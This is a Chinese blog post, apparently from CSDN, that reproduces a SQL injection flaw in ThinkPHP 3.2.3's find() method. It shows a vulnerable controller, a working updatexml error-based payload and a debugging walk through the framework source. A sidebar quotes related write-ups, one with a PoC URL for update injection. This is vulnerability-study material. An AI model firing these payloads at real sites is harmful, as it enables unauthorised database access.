thinkPHP3.2.3sql注入漏洞

最新推荐文章于 2025-10-27 14:35:14 发布
原创 最新推荐文章于 2025-10-27 14:35:14 发布 · 置顶 · 4.6k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #thinkphp

本文深入探讨了ThinkPHP3.2.3中的一个SQL注入漏洞,通过分析`M`、`D`、`U`、`I`等方法的使用,特别是`find`方法和`_parseOptions`函数,揭示了由于条件查询处理不当导致的安全问题。作者通过断点调试展示了攻击payload如何影响查询过程,最终形成未过滤的SQL语句,提醒开发者关注代码安全和输入验证。

前言

攻敌所必救:

搭建:

  1. 首先第一步就是必须先放在www目录下(我是windows用的phpstudy)!!!!

  2. 创建数据库,表名一定与你接下来要M的名字的相对应

  3. 连接数据库的文件不多说了,自己配置:ThinkPHP/Conf/convention.php

  4. 配置控制器:\WWW\thinkphp3.2.3\Application\Home\Controller\IndexController.class.php

    <?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
     
     
    public function index(){
     
     
        $this->show('原来内容已经省略,太占地方');
		$data = M('user')->find(I('GET.id'));
		var_dump($data);
	}
}

  5. 测试:

    在这里插入图片描述

正文

payload:

?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23

确实报错注入成功,一切都是因为这句代码的存在:$data = M('user')->find(I('GET.id'));

I和M方法都没有什么问题,真正的问题在于

  1. find 方法上,来自/ThinkPHP/Mode/Lite/Model.class.php
 public function find($options=array()) {
   
      
        // 根据复合主键查找记录
        $pk  =  $this->getPk();
        if (is_array($options) && (count($options) > 0) && is_array($pk)) {
   
   //但是会进入这里
            // 根据复合主键查询
            $count = 0;
            foreach (array_keys($options) as $key) {
   
   
                if (is_int($key)) $count++; 
            } 
            if ($count == count($pk)) {
   
   
                $i = 0;
                foreach ($pk as $field) {
   
   
                    $where[$field] = $options[$i];
                    unset($options[$i++]);
                }
                $options['where']  =  $where;
            } else {
   
   
                return false;
            }
        }
        // 总是查找一条记录
        $options['limit']   =   1;
        // 分析表达式
        $options            =   $this->_parseOptions($options);//前面都没有什么影响,重点是这里的函数调用
最低0.47元/天 解锁文章
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 7852
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
ThinkPHP3.2.3SQL注入漏洞的复现——考古?
Mrs_H的博客
11-11 1955
这里写目录标题关于ThinkPHPSQL注入漏洞.前言二.正文1.数据处理流程2.注入点一,数组注入3.注入点二,exp注入后记 关于ThinkPHPSQL注入漏洞.前言 最近拖延症又犯难了,导致很久都没有时间来写这个文章。而且因为一些奇怪的缘故,导致自己的MySQL数据库中间崩了好几次,导致这次的漏洞复现磕磕绊绊的。同时这也是我自己第一次做代码审计,效率着实算不上高,就以此来记录一下自己这次的学习(考古)过程吧。 二.正文 1.数据处理流程 环境搭建方面,就用thinkphp官网上的历史遗留版本
SQL 注入漏洞原理以及修复方法
最新发布
2509_93882264的博客
10-27 657
具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。注:把magic_quotes_gpc选项打开,在这种情况下所有的客户端GET和POST的数据都会自动进行addslashes处理,所以此时对字符串值的SQL注入是不可行的,但要防止对数字值的SQL注入,如用intval()等函数进行处理。使用参数化SQL语句,同时也能提高查询的效率。
[复现]Thinkphp3.2.3 漏洞
kuuhh的博客
08-02 1万+
前言 纸上得来终觉浅,绝知此事要躬行。 日志泄露 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。 THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log 需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。 SQL 注入 user表 一个小例子 代码如下 $id
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 5010
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
thinkPHP3.2.3sql注入漏洞
XINO
05-26 2155
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 首先配置一下数据库 相对于TP5,可以先看下框架的特定函数 thinkphp3内置了很多大写函数 A 快速实例化Action类库 B 执行行为类 C 配置参数存取方法 D 快速实例化Model类库 F 快速简单文本数据存取方法 I 获取系统输⼊变(与tp5input方法类似) L 语言参数存取方法 M 快速高性能实例化模型 R 快速远程调用Action类方法 S 快速缓存存取方法 U URL动态生成和重定向方法 W 快速Widget输
thinkphp3.2.3 sql注入漏洞原理
12-26
ThinkPHP 3.2.3版本中,存在SQL注入漏洞的原因主要在于框架未能充分过滤用户输入的数据。当开发者使用`I()`函数获取未经严格验证的GET参数并直接用于数据库查询时,攻击者可以通过构造恶意请求来执行任意SQL语句。...
下列哪些是Thinkphp-3.x存在的漏洞 A:Thinkphp 3.2.3缓存漏洞 B:Thinkphp 3.2.3sql注入漏洞 C:Thinkphp 3.2.3 update注入漏洞 D:Thinkphp 3.2.3 select & find & delete 注入漏洞
03-26
用户明确提到希望了解包括缓存漏洞SQL注入漏洞、update注入漏洞以及select/find/delete注入漏洞的列表。我需要根据提供的四个引用资料来整理这些信息,并确保回答符合系统级指令的要求,比如正确使用LaTeX格式和...
Thinkphp 3.2.3 sql注入漏洞
giaogiao123的博客
08-27 1541
源代码 class IndexController extends Controller { public function index(){ $a=M('xxx'); //表名 $id=I('GET.id'); $b=$a->find($id); var_dump($b); } } 创建一个test数据库 然后开启mysql命令行 CREATE TABLE `Course`( `id` VARCHAR(20), `username` VARCHAR
【安全漏洞ThinkPHP 3.2.3 漏洞复现
2201_75857869的博客
03-03 2446
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
免费thinkPHP3.2.3框架
07-20
免费thinkPHP3.2.3框架
thinkPHP3.2.3反序列化漏洞
qq_50589021的博客
10-10 1650
前言 ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 利用链: __destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()-> 搭建: 路径:/Application/Home/Controller/IndexController.class.php public fu
thinkphp3.2.3漏洞_命令执行漏洞
weixin_39724287的博客
11-21 1068
No.1漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,...
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞笔记
程序员六七的博客
05-16 710
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
ThinkPHP3.2.3_SQLi
Jeromeyoung
01-03 638
虽然是跟完了,但是如果能想一想这开发者为什么会这样写的话,会让我们对程序的代码逻辑更加亲切,也是一种提高审计能力的方法。我想:给where处理写一个解析数组的功能,肯定是为了迎合多个条件的where的情况,但是这里因为测试代码中只传入了一个条件所以没办法从这个漏洞跟一遍它的完整功能,但是看对exp进行的相关操作,开发者的原意应该是可以让“输入”去控制where条件中的判断逻辑符,比如‘>,
10-PHP代码审计——thinkphp3.2.3 update注入漏洞
网络安全
05-06 1067
实验环境的poc: http://www.tptest.com/index.php/home/index/index?username[0]=bind&username[1]=0%20and%201=(updatexml(1,concat(0x3a,(user())),1))%23&password=123456 通过更改用户密码的案例来分析update注入漏洞的过程: 在分析之前,先梳理一下漏洞利用的过程,update注入的流程是:M函数 --> where函...
ThinkPHP3.2.3 find注入
LiBai'S BLOG
12-31 7495
find(),select(),delete()注入方法类似 主要是在解析完$options之后,还对$options['where']判断了一下是否为空 在 D:\phpstudy_pro\WWW\thinkphp3\Application\Home\Controller下的IndexController.class.php添加代码 一样的思路,首先用id=1 and走一遍流程 一直走,注意到这个地方,我们条件满足进入parseType函数 注意,这时候我们的data还是1 and 经过强制转换后我
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yn8rt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值